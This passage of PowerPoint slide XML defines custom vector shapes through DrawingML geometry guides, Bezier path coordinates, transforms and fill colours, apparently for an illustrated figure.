                  <a:gd name="connsiteX7" fmla="*/ 129002 w 815751"/>
                  <a:gd name="connsiteY7" fmla="*/ 863178 h 948547"/>
                  <a:gd name="connsiteX8" fmla="*/ 257056 w 815751"/>
                  <a:gd name="connsiteY8" fmla="*/ 897326 h 948547"/>
                  <a:gd name="connsiteX9" fmla="*/ 492296 w 815751"/>
                  <a:gd name="connsiteY9" fmla="*/ 860333 h 948547"/>
                  <a:gd name="connsiteX10" fmla="*/ 602328 w 815751"/>
                  <a:gd name="connsiteY10" fmla="*/ 957085 h 948547"/>
                  <a:gd name="connsiteX11" fmla="*/ 758838 w 815751"/>
                  <a:gd name="connsiteY11" fmla="*/ 734176 h 948547"/>
                  <a:gd name="connsiteX12" fmla="*/ 737970 w 815751"/>
                  <a:gd name="connsiteY12" fmla="*/ 666829 h 94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5751" h="948547">
                    <a:moveTo>
                      <a:pt x="737970" y="666829"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="771169" y="552055"/>
                      <a:pt x="815751" y="510319"/>
                      <a:pt x="821442" y="388905"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="832825" y="174533"/>
                      <a:pt x="637424" y="0"/>
                      <a:pt x="410721" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="184018" y="0"/>
                      <a:pt x="0" y="173584"/>
                      <a:pt x="0" y="388905"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="451509"/>
                      <a:pt x="31302" y="502730"/>
                      <a:pt x="42685" y="561540"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42685" y="562489"/>
                      <a:pt x="81575" y="825237"/>
                      <a:pt x="90112" y="828082"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="90112" y="828082"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="95803" y="849899"/>
                      <a:pt x="111929" y="857487"/>
                      <a:pt x="129002" y="863178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136591" y="867921"/>
                      <a:pt x="252314" y="894481"/>
                      <a:pt x="257056" y="897326"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="338632" y="905863"/>
                      <a:pt x="416412" y="889738"/>
                      <a:pt x="492296" y="860333"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="515061" y="850847"/>
                      <a:pt x="578614" y="932422"/>
                      <a:pt x="602328" y="957085"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="615608" y="959930"/>
                      <a:pt x="742713" y="794883"/>
                      <a:pt x="758838" y="734176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="750301" y="723742"/>
                      <a:pt x="737970" y="688646"/>
                      <a:pt x="737970" y="666829"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FDCE98"/>
              </a:solidFill>
              <a:ln w="948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580AE8D-9042-445B-9D1C-34885AEA4D6C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="739140" flipH="1">
                <a:off x="2428885" y="1788769"/>
                <a:ext cx="684918" cy="506840"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 912217 w 948547"/>
                  <a:gd name="connsiteY0" fmla="*/ 188902 h 701925"/>
                  <a:gd name="connsiteX1" fmla="*/ 798391 w 948547"/>
                  <a:gd name="connsiteY1" fmla="*/ 80768 h 701925"/>
                  <a:gd name="connsiteX2" fmla="*/ 748118 w 948547"/>
                  <a:gd name="connsiteY2" fmla="*/ 11524 h 701925"/>
                  <a:gd name="connsiteX3" fmla="*/ 639983 w 948547"/>
                  <a:gd name="connsiteY3" fmla="*/ 13421 h 701925"/>
                  <a:gd name="connsiteX4" fmla="*/ 597299 w 948547"/>
                  <a:gd name="connsiteY4" fmla="*/ 19112 h 701925"/>
                  <a:gd name="connsiteX5" fmla="*/ 386721 w 948547"/>
                  <a:gd name="connsiteY5" fmla="*/ 10575 h 701925"/>
                  <a:gd name="connsiteX6" fmla="*/ 288072 w 948547"/>
                  <a:gd name="connsiteY6" fmla="*/ 24804 h 701925"/>
                  <a:gd name="connsiteX7" fmla="*/ 158121 w 948547"/>
                  <a:gd name="connsiteY7" fmla="*/ 56106 h 701925"/>
                  <a:gd name="connsiteX8" fmla="*/ 125870 w 948547"/>
                  <a:gd name="connsiteY8" fmla="*/ 76025 h 701925"/>
                  <a:gd name="connsiteX9" fmla="*/ 63266 w 948547"/>
                  <a:gd name="connsiteY9" fmla="*/ 198388 h 701925"/>
                  <a:gd name="connsiteX10" fmla="*/ 3508 w 948547"/>
                  <a:gd name="connsiteY10" fmla="*/ 349207 h 701925"/>
                  <a:gd name="connsiteX11" fmla="*/ 4456 w 948547"/>
                  <a:gd name="connsiteY11" fmla="*/ 422245 h 701925"/>
                  <a:gd name="connsiteX12" fmla="*/ 4456 w 948547"/>
                  <a:gd name="connsiteY12" fmla="*/ 422245 h 701925"/>
                  <a:gd name="connsiteX13" fmla="*/ 58524 w 948547"/>
                  <a:gd name="connsiteY13" fmla="*/ 583498 h 701925"/>
                  <a:gd name="connsiteX14" fmla="*/ 71803 w 948547"/>
                  <a:gd name="connsiteY14" fmla="*/ 560733 h 701925"/>
                  <a:gd name="connsiteX15" fmla="*/ 104054 w 948547"/>
                  <a:gd name="connsiteY15" fmla="*/ 474415 h 701925"/>
                  <a:gd name="connsiteX16" fmla="*/ 142944 w 948547"/>
                  <a:gd name="connsiteY16" fmla="*/ 476312 h 701925"/>
                  <a:gd name="connsiteX17" fmla="*/ 200806 w 948547"/>
                  <a:gd name="connsiteY17" fmla="*/ 564527 h 701925"/>
                  <a:gd name="connsiteX18" fmla="*/ 263410 w 948547"/>
                  <a:gd name="connsiteY18" fmla="*/ 581601 h 701925"/>
                  <a:gd name="connsiteX19" fmla="*/ 421817 w 948547"/>
                  <a:gd name="connsiteY19" fmla="*/ 565476 h 701925"/>
                  <a:gd name="connsiteX20" fmla="*/ 497701 w 948547"/>
                  <a:gd name="connsiteY20" fmla="*/ 528482 h 701925"/>
                  <a:gd name="connsiteX21" fmla="*/ 524260 w 948547"/>
                  <a:gd name="connsiteY21" fmla="*/ 540814 h 701925"/>
                  <a:gd name="connsiteX22" fmla="*/ 739581 w 948547"/>
                  <a:gd name="connsiteY22" fmla="*/ 710604 h 701925"/>
                  <a:gd name="connsiteX23" fmla="*/ 788905 w 948547"/>
                  <a:gd name="connsiteY23" fmla="*/ 634720 h 701925"/>
                  <a:gd name="connsiteX24" fmla="*/ 814516 w 948547"/>
                  <a:gd name="connsiteY24" fmla="*/ 570219 h 701925"/>
                  <a:gd name="connsiteX25" fmla="*/ 863841 w 948547"/>
                  <a:gd name="connsiteY25" fmla="*/ 491489 h 701925"/>
                  <a:gd name="connsiteX26" fmla="*/ 919805 w 948547"/>
                  <a:gd name="connsiteY26" fmla="*/ 377663 h 701925"/>
                  <a:gd name="connsiteX27" fmla="*/ 912217 w 948547"/>
                  <a:gd name="connsiteY27" fmla="*/ 188902 h 701925"/>
                  <a:gd name="connsiteX28" fmla="*/ 104054 w 948547"/>
                  <a:gd name="connsiteY28" fmla="*/ 413708 h 701925"/>
                  <a:gd name="connsiteX29" fmla="*/ 85083 w 948547"/>
                  <a:gd name="connsiteY29" fmla="*/ 446907 h 701925"/>
                  <a:gd name="connsiteX30" fmla="*/ 40501 w 948547"/>
                  <a:gd name="connsiteY30" fmla="*/ 445959 h 701925"/>
                  <a:gd name="connsiteX31" fmla="*/ 24376 w 948547"/>
                  <a:gd name="connsiteY31" fmla="*/ 431731 h 701925"/>
                  <a:gd name="connsiteX32" fmla="*/ 44295 w 948547"/>
                  <a:gd name="connsiteY32" fmla="*/ 400429 h 701925"/>
                  <a:gd name="connsiteX33" fmla="*/ 80340 w 948547"/>
                  <a:gd name="connsiteY33" fmla="*/ 394737 h 701925"/>
                  <a:gd name="connsiteX34" fmla="*/ 100260 w 948547"/>
                  <a:gd name="connsiteY34" fmla="*/ 403274 h 701925"/>
                  <a:gd name="connsiteX35" fmla="*/ 104054 w 948547"/>
                  <a:gd name="connsiteY35" fmla="*/ 413708 h 701925"/>
                  <a:gd name="connsiteX36" fmla="*/ 366802 w 948547"/>
                  <a:gd name="connsiteY36" fmla="*/ 431731 h 701925"/>
                  <a:gd name="connsiteX37" fmla="*/ 346882 w 948547"/>
                  <a:gd name="connsiteY37" fmla="*/ 442165 h 701925"/>
                  <a:gd name="connsiteX38" fmla="*/ 257719 w 948547"/>
                  <a:gd name="connsiteY38" fmla="*/ 439319 h 701925"/>
                  <a:gd name="connsiteX39" fmla="*/ 229262 w 948547"/>
                  <a:gd name="connsiteY39" fmla="*/ 405171 h 701925"/>
                  <a:gd name="connsiteX40" fmla="*/ 235902 w 948547"/>
                  <a:gd name="connsiteY40" fmla="*/ 396634 h 701925"/>
                  <a:gd name="connsiteX41" fmla="*/ 270050 w 948547"/>
                  <a:gd name="connsiteY41" fmla="*/ 385252 h 701925"/>
                  <a:gd name="connsiteX42" fmla="*/ 327911 w 948547"/>
                  <a:gd name="connsiteY42" fmla="*/ 395686 h 701925"/>
                  <a:gd name="connsiteX43" fmla="*/ 366802 w 948547"/>
                  <a:gd name="connsiteY43" fmla="*/ 431731 h 70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48547" h="701925">
                    <a:moveTo>
                      <a:pt x="912217" y="188902"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="893246" y="179417"/>
                      <a:pt x="800288" y="120607"/>
                      <a:pt x="798391" y="80768"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="796494" y="48517"/>
                      <a:pt x="778471" y="24804"/>
                      <a:pt x="748118" y="11524"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="711124" y="-4601"/>
                      <a:pt x="676028" y="-3653"/>
                      <a:pt x="639983" y="13421"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="626704" y="21958"/>
                      <a:pt x="611527" y="21009"/>
                      <a:pt x="597299" y="19112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="573585" y="15318"/>
                      <a:pt x="432251" y="141"/>
                      <a:pt x="386721" y="10575"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="356367" y="18164"/>
                      <a:pt x="318426" y="18164"/>
                      <a:pt x="288072" y="24804"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="266255" y="29546"/>
                      <a:pt x="203651" y="58951"/>
                      <a:pt x="158121" y="56106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144841" y="55157"/>
                      <a:pt x="133459" y="63694"/>
                      <a:pt x="125870" y="76025"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101208" y="114916"/>
                      <a:pt x="78443" y="154755"/>
                      <a:pt x="63266" y="198388"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39553" y="258146"/>
                      <a:pt x="7302" y="292294"/>
                      <a:pt x="3508" y="349207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="662" y="358692"/>
                      <a:pt x="-3132" y="396634"/>
                      <a:pt x="4456" y="422245"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="4456" y="422245"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="18684" y="451650"/>
                      <a:pt x="51884" y="563579"/>
                      <a:pt x="58524" y="583498"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71803" y="581601"/>
                      <a:pt x="68958" y="569270"/>
                      <a:pt x="71803" y="560733"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80340" y="531328"/>
                      <a:pt x="85083" y="500026"/>
                      <a:pt x="104054" y="474415"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115436" y="463981"/>
                      <a:pt x="132510" y="457341"/>
                      <a:pt x="142944" y="476312"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="167607" y="518049"/>
                      <a:pt x="177092" y="536071"/>
                      <a:pt x="200806" y="564527"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="217880" y="584447"/>
                      <a:pt x="237799" y="592984"/>
                      <a:pt x="263410" y="581601"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="296609" y="568322"/>
                      <a:pt x="403795" y="566424"/>
                      <a:pt x="421817" y="565476"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="455017" y="564527"/>
                      <a:pt x="484421" y="559785"/>
                      <a:pt x="497701" y="528482"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="501495" y="518049"/>
                      <a:pt x="518569" y="532277"/>
                      <a:pt x="524260" y="540814"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="555563" y="616697"/>
                      <a:pt x="685514" y="703964"/>
                      <a:pt x="739581" y="710604"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="782266" y="715346"/>
                      <a:pt x="786060" y="649897"/>
                      <a:pt x="788905" y="634720"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="792699" y="611006"/>
                      <a:pt x="797442" y="586344"/>
                      <a:pt x="814516" y="570219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="837281" y="549351"/>
                      <a:pt x="860995" y="522791"/>
                      <a:pt x="863841" y="491489"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="868583" y="444062"/>
                      <a:pt x="882811" y="403274"/>
                      <a:pt x="919805" y="377663"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945416" y="360590"/>
                      <a:pt x="973872" y="220205"/>
                      <a:pt x="912217" y="188902"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="104054" y="413708"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="98363" y="425091"/>
                      <a:pt x="95517" y="444062"/>
                      <a:pt x="85083" y="446907"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67060" y="451650"/>
                      <a:pt x="57575" y="453547"/>
                      <a:pt x="40501" y="445959"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35758" y="444062"/>
                      <a:pt x="25324" y="441216"/>
                      <a:pt x="24376" y="431731"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23427" y="421297"/>
                      <a:pt x="32913" y="416554"/>
                      <a:pt x="44295" y="400429"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55678" y="386200"/>
                      <a:pt x="68958" y="389995"/>
                      <a:pt x="80340" y="394737"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87929" y="397583"/>
                      <a:pt x="93620" y="399480"/>
                      <a:pt x="100260" y="403274"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102157" y="406120"/>
                      <a:pt x="106899" y="408017"/>
                      <a:pt x="104054" y="413708"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="366802" y="431731"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="363956" y="440268"/>
                      <a:pt x="354470" y="440268"/>
                      <a:pt x="346882" y="442165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="316529" y="448805"/>
                      <a:pt x="287123" y="445959"/>
                      <a:pt x="257719" y="439319"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="239696" y="435525"/>
                      <a:pt x="237799" y="417502"/>
                      <a:pt x="229262" y="405171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="224519" y="398531"/>
                      <a:pt x="232108" y="397583"/>
                      <a:pt x="235902" y="396634"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="247284" y="392840"/>
                      <a:pt x="259616" y="390943"/>
                      <a:pt x="270050" y="385252"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="292815" y="372921"/>
                      <a:pt x="310837" y="378612"/>
                      <a:pt x="327911" y="395686"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="346882" y="412760"/>
                      <a:pt x="369647" y="422245"/>
                      <a:pt x="366802" y="431731"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="948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EAC8916-4A6C-407A-86DD-9D643E06A17C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="739140" flipH="1">
                <a:off x="2568160" y="2404920"/>
                <a:ext cx="253420" cy="143832"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 9 w 350962"/>
                  <a:gd name="connsiteY0" fmla="*/ 48698 h 199195"/>
                  <a:gd name="connsiteX1" fmla="*/ 252323 w 350962"/>
                  <a:gd name="connsiteY1" fmla="*/ 2219 h 199195"/>
                  <a:gd name="connsiteX2" fmla="*/ 274139 w 350962"/>
                  <a:gd name="connsiteY2" fmla="*/ 6013 h 199195"/>
                  <a:gd name="connsiteX3" fmla="*/ 357612 w 350962"/>
                  <a:gd name="connsiteY3" fmla="*/ 112251 h 199195"/>
                  <a:gd name="connsiteX4" fmla="*/ 321567 w 350962"/>
                  <a:gd name="connsiteY4" fmla="*/ 145450 h 199195"/>
                  <a:gd name="connsiteX5" fmla="*/ 174542 w 350962"/>
                  <a:gd name="connsiteY5" fmla="*/ 205208 h 199195"/>
                  <a:gd name="connsiteX6" fmla="*/ 81584 w 350962"/>
                  <a:gd name="connsiteY6" fmla="*/ 173906 h 199195"/>
                  <a:gd name="connsiteX7" fmla="*/ 9 w 350962"/>
                  <a:gd name="connsiteY7" fmla="*/ 48698 h 1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62" h="199195">
                    <a:moveTo>
                      <a:pt x="9" y="48698"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="88224" y="53441"/>
                      <a:pt x="171696" y="37315"/>
                      <a:pt x="252323" y="2219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="260860" y="-1575"/>
                      <a:pt x="268448" y="-626"/>
                      <a:pt x="274139" y="6013"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="299750" y="40161"/>
                      <a:pt x="338641" y="73360"/>
                      <a:pt x="357612" y="112251"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="359509" y="122685"/>
                      <a:pt x="327258" y="142604"/>
                      <a:pt x="321567" y="145450"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="307338" y="151141"/>
                      <a:pt x="237146" y="202363"/>
                      <a:pt x="174542" y="205208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130909" y="207105"/>
                      <a:pt x="108143" y="208054"/>
                      <a:pt x="81584" y="173906"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73047" y="166318"/>
                      <a:pt x="-940" y="55338"/>
                      <a:pt x="9" y="48698"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E0B282"/>
              </a:solidFill>
              <a:ln w="948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705535D-4C08-48DC-ACF1-B05D2E497A92}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="739140" flipH="1">
                <a:off x="1329694" y="2274675"/>
                <a:ext cx="2007347" cy="2918396"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1500877 w 2007347"/>
                  <a:gd name="connsiteY0" fmla="*/ 67223 h 2918396"/>
                  <a:gd name="connsiteX1" fmla="*/ 1152254 w 2007347"/>
                  <a:gd name="connsiteY1" fmla="*/ 102 h 2918396"/>
                  <a:gd name="connsiteX2" fmla="*/ 911848 w 2007347"/>
                  <a:gd name="connsiteY2" fmla="*/ 224754 h 2918396"/>
                  <a:gd name="connsiteX3" fmla="*/ 792671 w 2007347"/>
                  <a:gd name="connsiteY3" fmla="*/ 121332 h 2918396"/>
                  <a:gd name="connsiteX4" fmla="*/ 667332 w 2007347"/>
                  <a:gd name="connsiteY4" fmla="*/ 156948 h 2918396"/>
                  <a:gd name="connsiteX5" fmla="*/ 356379 w 2007347"/>
                  <a:gd name="connsiteY5" fmla="*/ 367902 h 2918396"/>
                  <a:gd name="connsiteX6" fmla="*/ 254327 w 2007347"/>
                  <a:gd name="connsiteY6" fmla="*/ 471324 h 2918396"/>
                  <a:gd name="connsiteX7" fmla="*/ 273504 w 2007347"/>
                  <a:gd name="connsiteY7" fmla="*/ 28183 h 2918396"/>
                  <a:gd name="connsiteX8" fmla="*/ 70083 w 2007347"/>
                  <a:gd name="connsiteY8" fmla="*/ 36402 h 2918396"/>
                  <a:gd name="connsiteX9" fmla="*/ 222 w 2007347"/>
                  <a:gd name="connsiteY9" fmla="*/ 678170 h 2918396"/>
                  <a:gd name="connsiteX10" fmla="*/ 221450 w 2007347"/>
                  <a:gd name="connsiteY10" fmla="*/ 797345 h 2918396"/>
                  <a:gd name="connsiteX11" fmla="*/ 782398 w 2007347"/>
                  <a:gd name="connsiteY11" fmla="*/ 491187 h 2918396"/>
                  <a:gd name="connsiteX12" fmla="*/ 991298 w 2007347"/>
                  <a:gd name="connsiteY12" fmla="*/ 955562 h 2918396"/>
                  <a:gd name="connsiteX13" fmla="*/ 1117323 w 2007347"/>
                  <a:gd name="connsiteY13" fmla="*/ 1165147 h 2918396"/>
                  <a:gd name="connsiteX14" fmla="*/ 474870 w 2007347"/>
                  <a:gd name="connsiteY14" fmla="*/ 1417196 h 2918396"/>
                  <a:gd name="connsiteX15" fmla="*/ 322133 w 2007347"/>
                  <a:gd name="connsiteY15" fmla="*/ 1767874 h 2918396"/>
                  <a:gd name="connsiteX16" fmla="*/ 274189 w 2007347"/>
                  <a:gd name="connsiteY16" fmla="*/ 2209646 h 2918396"/>
                  <a:gd name="connsiteX17" fmla="*/ 203642 w 2007347"/>
                  <a:gd name="connsiteY17" fmla="*/ 2475394 h 2918396"/>
                  <a:gd name="connsiteX18" fmla="*/ 175561 w 2007347"/>
                  <a:gd name="connsiteY18" fmla="*/ 2500736 h 2918396"/>
                  <a:gd name="connsiteX19" fmla="*/ 172136 w 2007347"/>
                  <a:gd name="connsiteY19" fmla="*/ 2539091 h 2918396"/>
                  <a:gd name="connsiteX20" fmla="*/ 568019 w 2007347"/>
                  <a:gd name="connsiteY20" fmla="*/ 2605528 h 2918396"/>
                  <a:gd name="connsiteX21" fmla="*/ 594730 w 2007347"/>
                  <a:gd name="connsiteY21" fmla="*/ 2521968 h 2918396"/>
                  <a:gd name="connsiteX22" fmla="*/ 575553 w 2007347"/>
                  <a:gd name="connsiteY22" fmla="*/ 2345259 h 2918396"/>
                  <a:gd name="connsiteX23" fmla="*/ 608429 w 2007347"/>
                  <a:gd name="connsiteY23" fmla="*/ 2150058 h 2918396"/>
                  <a:gd name="connsiteX24" fmla="*/ 706372 w 2007347"/>
                  <a:gd name="connsiteY24" fmla="*/ 1767874 h 2918396"/>
                  <a:gd name="connsiteX25" fmla="*/ 1240608 w 2007347"/>
                  <a:gd name="connsiteY25" fmla="*/ 1608973 h 2918396"/>
                  <a:gd name="connsiteX26" fmla="*/ 1165952 w 2007347"/>
                  <a:gd name="connsiteY26" fmla="*/ 1886365 h 2918396"/>
                  <a:gd name="connsiteX27" fmla="*/ 1139240 w 2007347"/>
                  <a:gd name="connsiteY27" fmla="*/ 2050060 h 2918396"/>
                  <a:gd name="connsiteX28" fmla="*/ 1085817 w 2007347"/>
                  <a:gd name="connsiteY28" fmla="*/ 2426765 h 2918396"/>
                  <a:gd name="connsiteX29" fmla="*/ 1089733 w 2007347"/>
                  <a:gd name="connsiteY29" fmla="*/ 2501014 h 2918396"/>
                  <a:gd name="connsiteX30" fmla="*/ 1112175 w 2007347"/>
                  <a:gd name="connsiteY30" fmla="*/ 2574680 h 2918396"/>
                  <a:gd name="connsiteX31" fmla="*/ 1494014 w 2007347"/>
                  <a:gd name="connsiteY31" fmla="*/ 2824200 h 2918396"/>
                  <a:gd name="connsiteX32" fmla="*/ 1639399 w 2007347"/>
                  <a:gd name="connsiteY32" fmla="*/ 2918396 h 2918396"/>
                  <a:gd name="connsiteX33" fmla="*/ 1628785 w 2007347"/>
                  <a:gd name="connsiteY33" fmla="*/ 2889170 h 2918396"/>
                  <a:gd name="connsiteX34" fmla="*/ 1598135 w 2007347"/>
                  <a:gd name="connsiteY34" fmla="*/ 2789086 h 2918396"/>
                  <a:gd name="connsiteX35" fmla="*/ 1463891 w 2007347"/>
                  <a:gd name="connsiteY35" fmla="*/ 2415806 h 2918396"/>
                  <a:gd name="connsiteX36" fmla="*/ 1790597 w 2007347"/>
                  <a:gd name="connsiteY36" fmla="*/ 1692533 h 2918396"/>
                  <a:gd name="connsiteX37" fmla="*/ 1865937 w 2007347"/>
                  <a:gd name="connsiteY37" fmla="*/ 1439798 h 2918396"/>
                  <a:gd name="connsiteX38" fmla="*/ 1720735 w 2007347"/>
                  <a:gd name="connsiteY38" fmla="*/ 874741 h 2918396"/>
                  <a:gd name="connsiteX39" fmla="*/ 1933059 w 2007347"/>
                  <a:gd name="connsiteY39" fmla="*/ 913097 h 2918396"/>
                  <a:gd name="connsiteX40" fmla="*/ 1991962 w 2007347"/>
                  <a:gd name="connsiteY40" fmla="*/ 710361 h 2918396"/>
                  <a:gd name="connsiteX41" fmla="*/ 1659092 w 2007347"/>
                  <a:gd name="connsiteY41" fmla="*/ 171331 h 2918396"/>
                  <a:gd name="connsiteX42" fmla="*/ 1500877 w 2007347"/>
                  <a:gd name="connsiteY42" fmla="*/ 67223 h 2918396"/>
                  <a:gd name="connsiteX0" fmla="*/ 1500877 w 2007347"/>
                  <a:gd name="connsiteY0" fmla="*/ 67223 h 2918396"/>
                  <a:gd name="connsiteX1" fmla="*/ 1152254 w 2007347"/>
                  <a:gd name="connsiteY1" fmla="*/ 102 h 2918396"/>
                  <a:gd name="connsiteX2" fmla="*/ 911848 w 2007347"/>
                  <a:gd name="connsiteY2" fmla="*/ 224754 h 2918396"/>
                  <a:gd name="connsiteX3" fmla="*/ 792671 w 2007347"/>
                  <a:gd name="connsiteY3" fmla="*/ 121332 h 2918396"/>
                  <a:gd name="connsiteX4" fmla="*/ 667332 w 2007347"/>
                  <a:gd name="connsiteY4" fmla="*/ 156948 h 2918396"/>
                  <a:gd name="connsiteX5" fmla="*/ 356379 w 2007347"/>
                  <a:gd name="connsiteY5" fmla="*/ 367902 h 2918396"/>
                  <a:gd name="connsiteX6" fmla="*/ 254327 w 2007347"/>
                  <a:gd name="connsiteY6" fmla="*/ 471324 h 2918396"/>
                  <a:gd name="connsiteX7" fmla="*/ 273504 w 2007347"/>
                  <a:gd name="connsiteY7" fmla="*/ 28183 h 2918396"/>
                  <a:gd name="connsiteX8" fmla="*/ 70083 w 2007347"/>
                  <a:gd name="connsiteY8" fmla="*/ 36402 h 2918396"/>
                  <a:gd name="connsiteX9" fmla="*/ 222 w 2007347"/>
                  <a:gd name="connsiteY9" fmla="*/ 678170 h 2918396"/>
                  <a:gd name="connsiteX10" fmla="*/ 221450 w 2007347"/>
                  <a:gd name="connsiteY10" fmla="*/ 797345 h 2918396"/>
                  <a:gd name="connsiteX11" fmla="*/ 782398 w 2007347"/>
                  <a:gd name="connsiteY11" fmla="*/ 491187 h 2918396"/>
                  <a:gd name="connsiteX12" fmla="*/ 991298 w 2007347"/>
                  <a:gd name="connsiteY12" fmla="*/ 955562 h 2918396"/>
                  <a:gd name="connsiteX13" fmla="*/ 1117323 w 2007347"/>
                  <a:gd name="connsiteY13" fmla="*/ 1165147 h 2918396"/>
                  <a:gd name="connsiteX14" fmla="*/ 474870 w 2007347"/>
                  <a:gd name="connsiteY14" fmla="*/ 1417196 h 2918396"/>
                  <a:gd name="connsiteX15" fmla="*/ 322133 w 2007347"/>
                  <a:gd name="connsiteY15" fmla="*/ 1767874 h 2918396"/>
                  <a:gd name="connsiteX16" fmla="*/ 274189 w 2007347"/>
                  <a:gd name="connsiteY16" fmla="*/ 2209646 h 2918396"/>
                  <a:gd name="connsiteX17" fmla="*/ 203642 w 2007347"/>
                  <a:gd name="connsiteY17" fmla="*/ 2475394 h 2918396"/>
                  <a:gd name="connsiteX18" fmla="*/ 175561 w 2007347"/>
                  <a:gd name="connsiteY18" fmla="*/ 2500736 h 2918396"/>
                  <a:gd name="connsiteX19" fmla="*/ 172136 w 2007347"/>
                  <a:gd name="connsiteY19" fmla="*/ 2539091 h 2918396"/>
